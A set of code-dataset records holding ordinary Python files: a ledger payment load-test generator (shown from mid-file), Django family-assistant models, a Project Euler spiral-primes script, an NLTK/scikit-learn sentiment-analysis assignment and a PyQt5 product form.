__retrieve_minted_sources(self):\n for payment_address in self._payment_addresses:\n self._sources_amounts.extend(await self._get_payment_sources(payment_address))\n\n async def __perform_payments(self):\n for source, amount in self._sources_amounts:\n address = random.choice(self._payment_addresses)\n\n inputs = [source]\n outputs = [{\"recipient\": address, \"amount\": amount}]\n\n payment_req, _ = await payment.build_payment_req(self._wallet_handle,\n self._submitter_did,\n json.dumps(inputs),\n json.dumps(outputs),\n None)\n\n payment_resp = await ledger.sign_and_submit_request(self._pool_handle,\n self._wallet_handle,\n self._submitter_did,\n payment_req)\n ensure_is_reply(payment_resp)\n\n receipt_infos_json = await payment.parse_payment_response(self._payment_method, payment_resp)\n receipt_infos = json.loads(receipt_infos_json)\n receipt_info = receipt_infos[0]\n\n self._receipts.append(receipt_info[\"receipt\"])\n\n def _gen_req_data(self):\n return (datetime.now().isoformat(), random.choice(self._receipts))\n\n async def _gen_req(self, submit_did, req_data):\n _, receipt = req_data\n req, _ = await payment.build_verify_payment_req(self._wallet_handle,\n self._submitter_did,\n receipt)\n return req\n","sub_path":"scripts/performance/perf_load/perf_req_gen_payment.py","file_name":"perf_req_gen_payment.py","file_ext":"py","file_size_in_byte":12460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"441590198","text":"# importing necessery django classes \nfrom django.contrib.auth.models import User\nfrom django.utils import timezone \nfrom django.db import models \nfrom django.urls import reverse\nfrom django.db.models.signals import post_save, pre_save\nfrom django.dispatch import receiver\nfrom django.contrib.auth.models import Group\n 
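\n# Illustrative usage sketch ('alice' and the field values are made-up\n# examples, not fixtures from this project): because the create_profile\n# receiver further below is hooked to post_save, saving a new User also\n# creates its linked myUser profile, reachable via the reverse accessor:\n#     u = User.objects.create_user(username='alice')\n#     u.myuser.group = 'Parent'\n#     u.myuser.save()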
\nclass myUser(models.Model):\n\n GROUPS = (\n ('Parent', 'Parent'),\n ('Child', 'Child'),\n ('External', 'External'),\n )\n\n user = models.OneToOneField(User, null = True, on_delete = models.CASCADE)\n name = models.CharField(max_length = 200, null = True)\n email = models.CharField(max_length = 200, null = True)\n phone = models.CharField(max_length = 200, null = True)\n group = models.CharField(max_length = 200, null = True, choices = GROUPS)\n profile_picture = models.ImageField(default = \"avatars/profile1.png\", upload_to = 'avatars', null = True, blank = True)\n date_created = models.DateTimeField(auto_now_add = True, null = True)\n\n def __str__(self):\n return str(self.name)\n\nclass Image(models.Model):\n title = models.CharField(max_length = 200, null = True)\n description = models.CharField(max_length = 200, null = True)\n image = models.ImageField(upload_to='images', null = True)\n\n def __str__(self):\n return self.title\n\nclass ImageComment(models.Model):\n author = models.ForeignKey(myUser, default = 1, on_delete = models.CASCADE)\n image = models.ForeignKey(Image, default = 1, on_delete = models.CASCADE)\n text = models.TextField(null = True)\n date_created = models.DateTimeField(auto_now_add = True, null = True)\n\n def __str__(self):\n return self.text\n\n@receiver(post_save, sender = User)\ndef create_profile(sender, instance, created, **kwargs):\n if created:\n myUser.objects.create(user = instance)\n group = Group.objects.get(name = 'Basic user')\n instance.groups.add(group)\n\npost_save.connect(create_profile, sender = User)\n\nclass Child_Item(models.Model):\n CATEGORY = (\n ('To read', 'To read'),\n ('To watch', 'To watch'),\n ('To buy', 'To buy'),\n ('To do', 'To do'),\n )\n\n STATUS = (\n ('Task done', 'Task done'),\n ('Task not done yet', 'Task not done yet'),\n )\n\n owner = models.ForeignKey(myUser, null = True, default = None, on_delete = models.CASCADE)\n name = models.CharField(max_length = 200, null = True)\n description = models.CharField(max_length = 200, null = True)\n category = models.CharField(max_length = 200, null = True, choices = CATEGORY)\n status = models.CharField(max_length = 200, null = True, choices = STATUS)\n\n def __str__(self):\n return self.name\n\nclass Personal_Event(models.Model):\n STATUS = (\n ('Task done', 'Task done'),\n ('Task not done yet', 'Task not done yet'),\n )\n\n person = models.ForeignKey(myUser, null = True, default = None, on_delete = models.CASCADE)\n task = models.CharField(max_length = 200, null = True)\n description = models.CharField(max_length = 200, null = True)\n start_time = models.DateTimeField(null = True)\n end_time = models.DateTimeField(null = True)\n status = models.CharField(max_length = 200, null = True, choices = STATUS, default = 'Task not done yet')\n\n def __str__(self):\n return self.task\n\nclass Measurement(models.Model):\n\n CATEGORY = (\n ('Approved', 'Approved'),\n ('Awaiting approval', 'Awaiting approval'),\n )\n\n location = models.CharField(max_length=200)\n destination = models.CharField(max_length=200)\n distance = models.DecimalField(max_digits=10, decimal_places=2)\n created = models.DateTimeField(auto_now_add=True)\n start_time = models.DateTimeField(null = True)\n end_time = models.DateTimeField(null = True)\n\n votes = models.ManyToManyField(User, related_name = 'trip_vote')\n status = models.CharField(max_length = 200, null = True, choices = CATEGORY, default = 'Awaiting approval')\n \n\n def total_votes(self):\n return self.likes.count()\n\n\n def __str__(self):\n return 
f\"Distance from {self.location} to {self.destination} is {self.distance} km\"\n\nclass Event(models.Model):\n\n CATEGORY = (\n ('Urgent', 'Urgent'),\n ('Important', 'Important'),\n ('Can be delayed', 'Can be delayed'),\n ('Unimportant', 'Unimportant'),\n )\n\n title = models.CharField(max_length=200, null=True)\n person_in_charge = models.ForeignKey(myUser, null = True, default = None, on_delete = models.CASCADE)\n description = models.TextField(null=True)\n start_time = models.DateTimeField(null=True)\n end_time = models.DateTimeField(null=True)\n importance = models.CharField(max_length=200, null=True, choices = CATEGORY)\n\n @property\n def get_html_url(self):\n url = reverse('event_edit', args=(self.id,))\n if self.importance == \"Important\":\n return f' {self.title} - {self.person_in_charge.name}'\n if self.importance == \"Urgent\":\n return f' {self.title} - {self.person_in_charge.name}'\n if self.importance == \"Can be delayed\":\n return f' {self.title} - {self.person_in_charge.name}'\n if self.importance == \"Unimportant\":\n return f' {self.title} - {self.person_in_charge.name}'\n","sub_path":"sources/mysite/family_assistant/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"274792748","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 15 13:26:59 2015\n\n@author: jack.gang\n\"\"\"\n\nimport time \nfrom EulerFunctions import isPrime\n\nstart = time.clock()\n\nnum = 3 # starting number after middle\nsize = 1000000\ndiagonalNumIsPrime = []\nincrement = 2\n# doesn't matter which way it spirals\nfor n in range(3,size+1,2):\n for i in range(0,4):\n diagNum = (num + increment*i)\n diagonalNumIsPrime.append(isPrime(diagNum))\n if (n+1) < size:\n num = num + increment*4 + 2\n increment += 2\n # need to add 1 for \"1\" in middle of diagonals\n if sum(diagonalNumIsPrime) / (len(diagonalNumIsPrime)+1) < 0.10:\n break\n\nanswer = n\n \nelapsed = time.clock() - start\n\nprint(\"{} found in {} seconds\".format(answer,elapsed))\n","sub_path":"058 - Spiral primes.py","file_name":"058 - Spiral primes.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"451216933","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 28 19:06:18 2020\n\n@author: shahzeb\n\nIDE: Spyder(Python3.8)\n\"\"\"\n\"\"\" \nIntroduction: From the problem statement the required is as follows: F1-Score and Accuracy score\nfor the given sentiment_analysis.txt. The file contains column0 which has corpus sentences and \ncolumn1 which has the emotion for 0:Negative and 1:Positive.\n\nThe given dataset is in the form of Labeled data, hence supervised learning is obvious for data. And\npre-processing the data implementing Classification Algorithms is a good way to train\nand test models for this paticular dataset.\n\nSteps followed in this code assignment:\n \n A) Pre-Processing:\n \n 1) Tokenizing: The dataset is tokenized with 3 different tokenizers. Namely, Word_tokenizer,\n Treebank_tokenizer and Regexp_tokenizer. And after that pre-processing step-2,3,4 are applied to\n all the 3 tokenizers. 
\n 2) Removing the Stop words.\n 3) POS Tagging: It's resonable to do POS tagging after removing stop words as it'll remove\n unimportant words, thus we have to process only important words: saving time and computation power.\n 4) After that lemmatization(WordNetLemmatizer is used in this assignment) is chosen over \n stemmitization as it'll give the root word for any given word in the'\n \n 5)Data Cleaning: Numbers,Hyphens,quotation marks,new line characters,apostrophes,etc \n are removed from the txt.\n \n Note: I wanted to experiment with different tokenizers, lemmatizer,etc. The 3 different tokenizers \n were considered, but only 1 lemmatizer was used throughout this project as the result from the\n tokenizers were considerably similar, varying by 4-5% , So given the time constraint I \n only tried to do implement the Naive Bayers Classifier in CBOW for 3 tokenizers. And for \n remining only Treebank Tokenizer was used along with WordNetlemmatizer.\n \n \n B) Splitting Dataset/Corpus:\n The dataset/corpus is split into 66.6% of Training data and 33.3% of test data. \n Moreover, the data is shuffledeverytime the code is re-run such that different instances \n are shuffled between test and train datasets.\n C) Feature Engineering: In order to run machine learning algorithms we need to convert \n the text files into numerical feature vectors. Bag of Words (CountVectorizer()) is used\n in 1st for Naive Bayers and Random Forest Algorithms. A term-Document Matrix was constructed \n from the CountVectorizer() containing words or terms along columns and sentences along rows.\n The bag of words only considers the count of words which is not a good practice for doing sentiment analysis. \n Because some common words appear in many sentences which contain less importantnce. \n Therefore,TF-IDF is used later in this assignment for Naive Bayers and Random Forest Algorithms\n which takes into account the word based upon its uniqueness.\n \n D) Model Construction: MultiNomial Naive Bayers was constructed from sklearn.model_selection\n library and Random Forest Classifier was constructed from sklearn.ensemble.\n E) Evaluation: The accuracy_score, F1-scores are printed into the console.As well as confusion matrix is also calculated.\n\n\"\"\"\n#import nltk\n#nltk.download()\n\n# importing necessary libraries \nimport re\nimport nltk\nimport warnings \nfrom nltk.tokenize import RegexpTokenizer,word_tokenize,TreebankWordTokenizer\n\nwarnings.filterwarnings(action = 'ignore') \nimport pandas as pd\nX = pd.read_csv('sentiment_analysis.txt', sep=\"\\t\", header=None)\ntarget=X[1]\n#taking the output into target variable\n#To print the corpus from the dataset\n#corpus=X[0]\n#for line in corpus:\n# print(line)\n\n#importing stopwords library to later remove the stop words from our corpus\nfrom nltk.corpus import stopwords\nstop_words = set(stopwords.words('english'))\n\nfrom nltk.stem import WordNetLemmatizer #WordLemmatizer is used to cut down the word back to it's root word\nfrom nltk.corpus import wordnet #wordnet is a lexical database for the English language, we'll use it to find POS tags for words\nlemmatizer = WordNetLemmatizer() # creating instance of class WordNetLemmatizer\n\nprint(\"The corpus dataset, Column 0: is for Sentence Corpus and Column 1: is for emotions. 
For 0 value in Column 1 it's negative sentiment for the sentence and for value 1 its positive sentiment\")\nX\n # (A) PRE-PROCESSING\n#The function below converts nltk tag to wordnet tags for POS tagging.\ndef nltk_tag_to_wordnet_tag(nltk_tag):\n if nltk_tag.startswith('J'):\n return wordnet.ADJ\n elif nltk_tag.startswith('V'):\n return wordnet.VERB\n elif nltk_tag.startswith('N'):\n return wordnet.NOUN\n elif nltk_tag.startswith('R'):\n return wordnet.ADV\n else: \n return None\n\n# The function below is used for tokenization followed by removing stop words, POS Tagging words, Lemmatization. This function is for Wordtokenizer only.\ndef Wordtoken_lemmatize_sentence(sentence):\n \n tokenizer_word= word_tokenize(str(sentence)) #Tokenize the sentence \n filtered_sentence = ' '.join([w for w in tokenizer_word if not w in stop_words]) #After tokenizing find the POS tag for each token\n nltk_tagged = nltk.pos_tag(nltk.word_tokenize(filtered_sentence)) #nltk_tagged contains the POS tag that will be used by lemmatizer to effectively find root words\n #tuple of (token, wordnet_tag)\n wordnet_tagged = map(lambda x: (x[0], nltk_tag_to_wordnet_tag(x[1])), nltk_tagged)\n lemmatized_sentence = []\n for word, tag in wordnet_tagged:\n if tag is None:\n #If no available POS tag then append the token as it is.\n lemmatized_sentence.append(word)\n else: \n #Else use the POS tag to lemmatize the token\n lemmatized_sentence.append(lemmatizer.lemmatize(word, tag).lower()) #appending the words to sentances\n return \" \".join(lemmatized_sentence) #returning the lematized sentance\n\nX['Wordtoken_cleaned_txt']=X[0].apply(Wordtoken_lemmatize_sentence) #calling the above function(Wordtoken_lemmatize_sentence) and stores the values to X dataset in a new column named as Wordtoken_cleaned_txt.\n\nX\n# The function below is used for tokenization followed by removing stop words, POS Tagging words, Lemmatization. This function is for TreeBank Tokenizer only.\ndef Treetoken_lemmatize_sentence(sentence):\n treebank_tokenizer= TreebankWordTokenizer().tokenize(str(sentence)) #Tokenize the sentence \n filtered_sentence = ' '.join([w for w in treebank_tokenizer if not w in stop_words]) #After tokenizing find the POS tag for each token\n nltk_tagged = nltk.pos_tag(nltk.word_tokenize(filtered_sentence)) #nltk_tagged contains the POS tag that will be used by lemmatizer to effectively find root words\n wordnet_tagged = map(lambda x: (x[0], nltk_tag_to_wordnet_tag(x[1])), nltk_tagged)\n lemmatized_sentence = []\n for word, tag in wordnet_tagged:\n if tag is None:\n #If no available POS tag then append the token as it is.\n lemmatized_sentence.append(word)\n else: \n #Else use the POS tag to lemmatize the token\n lemmatized_sentence.append(lemmatizer.lemmatize(word, tag).lower()) #appending the words to sentances\n return \" \".join(lemmatized_sentence) #returning the lematized sentance\n\nX['TreeToken_cleaned_txt']=X[0].apply(Treetoken_lemmatize_sentence) #calling the above function(Treetoken_lemmatize_sentence) and stores the values to X dataset in a new column named as TreeToken_cleaned_txt.\n\nRegtokenizer = RegexpTokenizer('\\w+|\\$[\\d\\.]+|\\S+')\n\n# The function below is used for tokenization followed by removing stop words, POS Tagging words, Lemmatization. 
This function is for RegExp Tokenizer only.\ndef Regextoken_lemmatize_sentence(sentence):\n #tokenize the sentence and find the POS tag for each token\n regex_token=Regtokenizer.tokenize(str(sentence.lower())) #Tokenize the sentence \n filtered_sentence = ' '.join([w for w in regex_token if not w in stop_words]) #After tokenizing find the POS tag for each token\n nltk_tagged = nltk.pos_tag(nltk.word_tokenize(filtered_sentence)) #nltk_tagged contains the POS tag that will be used by lemmatizer to effectively find root words\n wordnet_tagged = map(lambda x: (x[0], nltk_tag_to_wordnet_tag(x[1])), nltk_tagged)\n lemmatized_sentence = []\n for word, tag in wordnet_tagged:\n if tag is None:\n #If no available POS tag then append the token as it is.\n lemmatized_sentence.append(word)\n else: \n #Else use the POS tag to lemmatize the token\n lemmatized_sentence.append(lemmatizer.lemmatize(word, tag).lower())\n return \" \".join(lemmatized_sentence) #returning the lematized sentance\n\n\nX['Regtoken_cleaned_txt']=X[0].apply(Regextoken_lemmatize_sentence) #calling the above function(Regextoken_lemmatize_sentence) and stores the values to X dataset in a new column named as Regtoken_cleaned_txt.\n\nX\n#print(\"The Dataset after applying the tokenizers, POS tagging, removing stop words and Lematizing\", X)\nprint(\"------------------\"*10)\n\n'''\n#The function cleantxt() as represented below makes sure only character from a-z \n#and A-Z are present and remaining ones are removed from the pre-processed dataset. \n#We apply this to all the 3 cleaned columns in the dataset X for each of the tokenizer used.'''\n\ndef cleantext(retext):\n return re.sub('[^a-zA-Z]',' ',str(retext))#.lower()\nX['TreeToken_cleaned_txt']=X['TreeToken_cleaned_txt'].apply(cleantext)\nX['Regtoken_cleaned_txt']=X['Regtoken_cleaned_txt'].apply(cleantext)\nX['Wordtoken_cleaned_txt']=X['Wordtoken_cleaned_txt'].apply(cleantext)\n#X_test['cleanedtxt']=X_test['Regtokenizedtxt'].apply(cleantext)\n#The function removechar() as represented below removes the new line character if any present,\n# if any apostrophes,hyphens,quotation marks,etc.\ndef removechar(text):\n text = re.sub('[0-9]+.\\t','',str(text))\n # removing new line characters\n text = re.sub('\\n ','',str(text))\n text = re.sub('\\n',' ',str(text))\n # removing apostrophes\n text = re.sub(\"'s\",'',str(text))\n # removing hyphens\n text = re.sub(\"-\",' ',str(text))\n text = re.sub(\"— \",'',str(text))\n # removing quotation marks\n text = re.sub('\\\"','',str(text))\n # removing any reference to outside text\n text = re.sub(\"[\\(\\[].*?[\\)\\]]\", \"\", str(text))\n return text\n \n#The below removechar is called for all the 3 columns in X dataset.\nX['TreeToken_cleaned_txt']=X['TreeToken_cleaned_txt'].apply(removechar)\nX['Regtoken_cleaned_txt']=X['Regtoken_cleaned_txt'].apply(removechar)\nX['Wordtoken_cleaned_txt']=X['Wordtoken_cleaned_txt'].apply(removechar)\n\n'''\n (B) Splitting Dataset/Corpus:\n #The dataset is split into 33.3% for test and 66.6%. 
This is taken randomly \n any other split for test and train data is possible.\n'''\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X['TreeToken_cleaned_txt'], target, test_size=0.33) #test and train data split for the data to which treebank token is applied\nX_train2, X_test2, y_train2, y_test2 = train_test_split(X['Regtoken_cleaned_txt'], target, test_size=0.33) #test and train data split for the data to which Regextoken is applied\nX_train3, X_test3, y_train3, y_test3 = train_test_split(X['Wordtoken_cleaned_txt'], target, test_size=0.33) #test and train data split for the data to which wordtoken is applied\nprint(\" The dataset is split as: For Training 66.6% and for Testing as 33.3%. \\nThe sizes of: X_Train={0}\\nX_Test={1}\\ny_train={2}\\ny_test={3}\".format(X_train.size,X_test.size,y_train.size,y_test.size))\n\n# As the X_train,y_train,X_train2,...,etc are of type pandas.series.series, but \n#for passing these values to CountVectorizer it needs to be of type pandas.Dataframe. \n#Hence, converting the type.\nX_train=X_train.to_frame()\ny_train=y_train.to_frame()\nX_test=X_test.to_frame()\ny_test=y_test.to_frame()\n\nX_train2=X_train2.to_frame()\ny_train2=y_train2.to_frame()\nX_test2=X_test2.to_frame()\ny_test2=y_test2.to_frame()\n\nX_train3=X_train3.to_frame()\ny_train3=y_train3.to_frame()\nX_test3=X_test3.to_frame()\ny_test3=y_test3.to_frame()\n\n''' (C) Feature Engineering\n Bag of Words:The important part is to find the features from the data to make\n machine learning algorithms works. In this case, we have text. We need to convert this \n text into numbers that we can do calculations on. We use word frequencies. That is treating\n every document as a set of the words it contains. Our features will be the counts of each of \n these words.\n The term-document matrix is constructed in the block below for each of the 3 tokenizers.\n'''\nfrom sklearn.feature_extraction.text import CountVectorizer\ncount_vect=CountVectorizer()\ncount_vect2=CountVectorizer()\ncount_vect3=CountVectorizer()\n\ncounts=count_vect.fit_transform(X_train['TreeToken_cleaned_txt']) #fitting the data\ncounts2=count_vect2.fit_transform(X_train2['Regtoken_cleaned_txt'])\ncounts3=count_vect3.fit_transform(X_train3['Wordtoken_cleaned_txt'])\n\ncounts_test=count_vect.transform(X_test[\"TreeToken_cleaned_txt\"]) #transform the data\ncounts_test2=count_vect2.transform(X_test2[\"Regtoken_cleaned_txt\"])\ncounts_test3=count_vect3.transform(X_test3[\"Wordtoken_cleaned_txt\"])\n\n\n''' (D) and (E) Classifiers construction and evaluation :Different estimators are better \n suited for different types of data and different problems. The Naive Byers is chosen for this\n dataset as it relies on a very simple representation of the document (called the bag of words representation). \n Also, it recommended on sklearn cheatsheet that if the dataset is <100k and it's text then Naive \n Bayers is a good option. 
''' (D) and (E) Classifier construction and evaluation: Different estimators are better\n    suited for different types of data and different problems. Naive Bayes is chosen for this\n    dataset as it relies on a very simple representation of the document (the bag of words representation).\n    Also, the sklearn cheat sheet recommends Naive Bayes as a good option when the dataset is <100k\n    samples of text. However, other classifiers may be applied as well.\n'''\nfrom sklearn.naive_bayes import MultinomialNB\nnb=MultinomialNB()\n\nnb.fit(counts, y_train) #fitting the model for the Treebank tokenizer data\n\nnb2=MultinomialNB()\nnb2.fit(counts2, y_train2) #fitting the model for the RegExp tokenizer data\n\nnb3=MultinomialNB()\nnb3.fit(counts3, y_train3) #fitting the model for the word tokenizer data\nprint(\"-----------\"*10)\nprint(\"For Multinomial Naive Bayes Classifier on Bag of Words (BoW)\")\nprint(\"Accuracy for NB using TreeBankTokenizer :\", nb.score(counts_test, y_test))\nprint(\"Accuracy for NB using RegExp Tokenizer:\", nb2.score(counts_test2, y_test2))\nprint(\"Accuracy for NB using Word Tokenizer:\", nb3.score(counts_test3, y_test3))\ny_pred=nb.predict(counts_test) #evaluating the test set\nfrom sklearn.metrics import confusion_matrix,f1_score,accuracy_score,classification_report #importing all the metrics\nconfusion_matrix(y_test, y_pred) # the confusion matrix, also known as error matrix, allows visualization of the performance of an algorithm\n\ny_pred2=nb2.predict(counts_test2) #evaluating the test set for the RegExp tokenizer model\ny_pred3=nb3.predict(counts_test3) #evaluating the test set for the word tokenizer model\nf1_score(y_test,y_pred, average=\"macro\" )\nprint(\"--------\"*10)\nprint(\"Classification report for Naive Bayes Classifier using TreeBankTokenizer\\n\",classification_report(y_test,y_pred))\nprint(\"--------\"*10)\nprint(\"Classification report for Naive Bayes Classifier using RegexTokenizer\\n\",classification_report(y_test2,y_pred2))\nprint(\"--------\"*10)\nprint(\"Classification report for Naive Bayes Classifier using WordTokenizer\\n\",classification_report(y_test3,y_pred3))\nfrom sklearn.ensemble import RandomForestClassifier\n\nclf = RandomForestClassifier(n_estimators=1000, bootstrap=True, max_features='sqrt')\nclf.fit(counts, y_train) #fitting the Random Forest model\ny_pred=clf.predict(counts_test) #evaluating the test set for random forest. Note: from here on only the TreeBank tokenizer data is used\nprint(\"-----------\"*10)\nprint(\"For Random Forest Classifier on Bag of Words (BoW) considering TreeBankTokenizer\")\nprint(\"The accuracy for RandomForest Classifier is :\", accuracy_score(y_test, y_pred))\nprint(\"The F1-Score for RandomForest Classifier is :\", f1_score(y_test,y_pred, average=\"macro\" ))\n'''\n    Feature Engineering\n    TF-IDF: A term-document matrix was constructed by CountVectorizer(), containing words or terms along the columns and sentences along the rows.\n    The bag of words only considers raw counts of words, which is not ideal for sentiment analysis,\n    because some common words appear in many sentences yet carry little importance.\n    Therefore, TF-IDF is used in this assignment for the Naive Bayes and Random Forest algorithms;\n    it weights each word by its uniqueness across documents.\n'''\nfrom sklearn.feature_extraction.text import TfidfTransformer\ntfidf_transformer = TfidfTransformer()\nX_train_tfidf = tfidf_transformer.fit_transform(counts) #counts is the Bag-of-Words count matrix, to which we fit and apply the TF-IDF transform\n
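\n# --- Aside (added for illustration; not in the original): TfidfTransformer\n# rescales raw counts by inverse document frequency and L2-normalises each row;\n# a self-contained toy example, assuming scikit-learn is installed.\nfrom sklearn.feature_extraction.text import CountVectorizer as _CV, TfidfTransformer as _TT\n_docs = ['good good movie', 'bad movie']\n_tfidf = _TT().fit_transform(_CV().fit_transform(_docs))\nprint(_tfidf.toarray())  # the shared term 'movie' gets a lower weight than rare terms\n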
X_train_tfidf.shape #Displays the dimensions of the variable\nfrom sklearn.naive_bayes import MultinomialNB\nclf1 = MultinomialNB().fit(X_train_tfidf, y_train)\ny_pred1 = clf1.predict(tfidf_transformer.transform(counts_test)) #the test counts must also be TF-IDF transformed before predicting\n\naccuracy_score(y_test, y_pred1) #evaluating the test set\nprint(\"-----------\"*10)\nprint(\"For Multinomial Naive Bayes Classifier on TF-IDF, considering TreeBankTokenizer\")\nprint(\"The accuracy for Multinomial Naive Bayes Classifier is :\", accuracy_score(y_test, y_pred1))\nprint(\"The F1-Score for Multinomial Naive Bayes Classifier is :\", f1_score(y_test,y_pred1, average=\"macro\" ))\nclf_1_randomforest= RandomForestClassifier(n_estimators=1000, bootstrap=True, max_features='sqrt')\nclf_1_randomforest.fit(X_train_tfidf, y_train) #fitting the Random Forest model\ny_pred1=clf_1_randomforest.predict(tfidf_transformer.transform(counts_test)) #evaluating the test set for the TF-IDF random forest\naccuracy_score(y_test, y_pred1) #accuracy score for the model\nprint(\"-----------\"*10)\nprint(\"For Random Forest Classifier on TF-IDF, considering TreeBankTokenizer\")\nprint(\"The accuracy for RandomForest Classifier is :\", accuracy_score(y_test, y_pred1))\nprint(\"The F1-Score for RandomForest Classifier is :\", f1_score(y_test,y_pred1, average=\"macro\" ))","sub_path":"1_sentiment_analy_NLP/sentiment_analysis_solution_code.py","file_name":"sentiment_analysis_solution_code.py","file_ext":"py","file_size_in_byte":18515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"645079572","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom ProduitDAO import *\nfrom FournisseurDAO import *\nfrom RubriqueDAO import *\nfrom SsRubriqueDAO import *\nfrom ProductWindow import Ui_MainWindow\n\nclass Form1(QMainWindow):\n    def __init__(self):\n        super(Form1, self).__init__()\n\n        self.ui = Ui_MainWindow()\n        self.ui.setupUi(self)\n\n        self.repo = ProduitDAO()\n        self.repo_f = FournisseurDAO()\n        self.repo_ssr = SsRubriqueDAO()\n        self.repo_r = RubriqueDAO()\n        self.model = QStandardItemModel(self.ui.listView)\n        self.model_f = QStandardItemModel(self.ui.listView_fourni)\n        self.model_ssr = QStandardItemModel(self.ui.listView_ssRubr)\n        self.model_r = QStandardItemModel(self.ui.comboBox_rubr)\n\n        self.ui.listView.setModel(self.model)\n        self.ui.listView_fourni.setModel(self.model_f)\n        self.ui.listView_ssRubr.setModel(self.model_ssr)\n        self.ui.comboBox_rubr.setModel(self.model_r)\n        # for product in self.repo.list():\n        #     item = QListWidgetItem(product)\n        #     self.ui.listWidget.addItem(item)\n\n        self.ui.pushButton_add.clicked.connect(self.pushButton_add_clicked)\n        self.ui.pushButton_upd.clicked.connect(self.pushButton_upd_clicked)\n        self.ui.pushButton_del.clicked.connect(self.pushButton_del_clicked)\n        self.ui.pushButton_ok.clicked.connect(self.pushButton_ok_clicked)\n        self.ui.pushButton_no.clicked.connect(self.pushButton_no_clicked)\n        self.ui.comboBox_rubr.currentIndexChanged.connect(self.comboBox_rubr_changed)\n\n        self.modif = False\n        self.maj_lists()\n
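\n    # --- Aside (added note, not part of the original form): Qt's model/view idiom --\n    # QStandardItem.setData(obj, role) stores an arbitrary Python object on an item\n    # under an integer role, and index.data(role) retrieves it later, e.g.:\n    #     item = QStandardItem(product.nom); item.setData(product, 1)\n    #     model.appendRow(item)   # later: selected_index.data(1) -> product\n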
    def maj_lists(self):\n        self.model.clear()\n        for product in self.repo.list():\n\n            item = QStandardItem(product.nom)\n            item.setData(product, 1)\n            # item = QStandardItem()\n            self.model.appendRow(item)\n        self.model_f.clear()\n        for fournis in self.repo_f.list():\n\n            item = QStandardItem(fournis.nom)\n            item.setData(fournis, 1)\n            # item = QStandardItem()\n            self.model_f.appendRow(item)\n        self.model_r.clear()\n        for rubrique in self.repo_r.list():\n            item = QStandardItem(rubrique.nom)\n            item.setData(rubrique, 1)\n            self.model_r.appendRow(item)\n\n    @pyqtSlot(\"QModelIndex\")\n    def on_listView_clicked(self, model_index):\n        p = model_index.data(1)\n        print(str(p.id) + \" \" + p.desc)\n\n    def pushButton_add_clicked(self):\n        pass\n\n    def pushButton_upd_clicked(self):\n        self.modif = True\n        i = self.ui.listView.selectedIndexes()\n\n        self.p_to_upd = i[0].data(1)\n        # p = model_index.data(1)\n        self.ui.lineEdit_name.setText(self.p_to_upd.nom)\n        self.ui.lineEdit_img.setText(self.p_to_upd.imge)\n        self.ui.doubleSpinBox_pricea.setValue(self.p_to_upd.prxa)\n        self.ui.doubleSpinBox_pricev.setValue(self.p_to_upd.prxv)\n        self.ui.textEdit_desc.setText(self.p_to_upd.desc)\n        self.ui.spinBox_stock.setValue(self.p_to_upd.stock)\n        if self.p_to_upd.activ == 0:\n            self.ui.radioButton_e0.setChecked(True)\n        if self.p_to_upd.publi == 0:\n            self.ui.radioButton_p0.setChecked(True)\n\n    def pushButton_del_clicked(self):\n        pass\n\n    def pushButton_ok_clicked(self):\n        if self.modif == False :\n            i = self.ui.listView_fourni.selectedIndexes()\n            fourni = i[0].data(1)\n\n            p = Produit(self.ui.lineEdit_name.text() , self.ui.textEdit_desc.toPlainText(), self.ui.doubleSpinBox_pricea.value() , self.ui.lineEdit_img.text() , self.Check_Publi() , self.Check_Etat() , self.ui.doubleSpinBox_pricev.value() , self.ui.spinBox_stock.value() , self.ui.doubleSpinBox_tva.value() , self.ui.comboBox_rubr.itemData(self.ui.comboBox_rubr.currentIndex(),1).id , fourni.id , id_prod=None)\n            self.repo.insert(p)\n            self.maj_lists()\n        elif self.modif == True :\n            i = self.ui.listView_fourni.selectedIndexes()\n            fourni = i[0].data(1)\n\n            self.p_to_upd.nom = self.ui.lineEdit_name.text()\n            self.p_to_upd.desc = self.ui.textEdit_desc.toPlainText()\n            self.p_to_upd.prxa = self.ui.doubleSpinBox_pricea.value()\n            self.p_to_upd.imge = self.ui.lineEdit_img.text()\n            self.p_to_upd.publi = self.Check_Publi()\n            self.p_to_upd.activ = self.Check_Etat()\n            self.p_to_upd.prxv = self.ui.doubleSpinBox_pricev.value()\n            self.p_to_upd.stock = self.ui.spinBox_stock.value()\n            self.p_to_upd.tva = self.ui.doubleSpinBox_tva.value()\n            self.p_to_upd.rubr = self.ui.comboBox_rubr.itemData(self.ui.comboBox_rubr.currentIndex(), 1 ).id\n            self.p_to_upd.fourni = fourni.id\n\n            self.repo.update(self.p_to_upd)\n            self.modif = False\n            self.maj_lists()\n\n    def comboBox_rubr_changed(self):\n        i = self.ui.comboBox_rubr.itemData(self.ui.comboBox_rubr.currentIndex() , 1)\n        self.model_ssr.clear()\n        for ssrubr in self.repo_ssr.list_by_rubrique(i.id):\n            item = QStandardItem(ssrubr.nom)\n            item.setData(ssrubr , 1)\n            self.model_ssr.appendRow(item)\n\n    def pushButton_no_clicked(self):\n        pass\n\n    def Check_Publi(self):\n        if self.ui.radioButton_p0.isChecked():\n            v = 1\n        else :\n            v = 0\n        return v\n\n    def Check_Etat(self):\n        if self.ui.radioButton_e0.isChecked():\n            v = 1\n        else :\n            v = 0\n        return v\n\n\napp = QApplication(sys.argv)\nwindow = Form1()\nwindow.show()\nsys.exit(app.exec_())\n","sub_path":"application python/Form.py","file_name":"Form.py","file_ext":"py","file_size_in_byte":5833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
